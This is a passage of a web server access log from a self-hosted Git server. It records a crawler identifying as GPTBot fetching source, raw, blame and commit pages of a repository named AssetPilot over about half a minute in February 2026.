Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" +[17/Feb/2026:13:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" +[17/Feb/2026:13:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" [Client 74.7.227.38] [Length 15976] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 10804] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" +[17/Feb/2026:13:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12724] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16417] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" +[17/Feb/2026:13:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16597] [Gzip 8.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" +[17/Feb/2026:13:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13397] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" +[17/Feb/2026:13:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12420] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" [Client 74.7.227.38] [Length 9874] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:13:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 259678] [Gzip 13.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 14836] [Gzip 9.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 10130] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates" +[17/Feb/2026:13:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15418] [Gzip 8.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" +[17/Feb/2026:13:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 11842] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" +[17/Feb/2026:13:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9892] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" +[17/Feb/2026:13:30:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:13:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16125] [Gzip 5.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:13:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 6903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 19063] [Gzip 10.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11325] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:13:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 15695] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates" +[17/Feb/2026:13:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14245] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:13:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker" [Client 74.7.227.38] [Length 174842] [Gzip 12.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2ftemplates" [Client 74.7.227.38] [Length 29260] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" +[17/Feb/2026:13:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 15794] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" +[17/Feb/2026:13:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14302] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" +[17/Feb/2026:13:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" +[17/Feb/2026:13:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:30:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:30:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/apple-touch-icon.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:30:59 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/favicon.ico" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16393] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16359] [Gzip 9.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18146] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:31:04 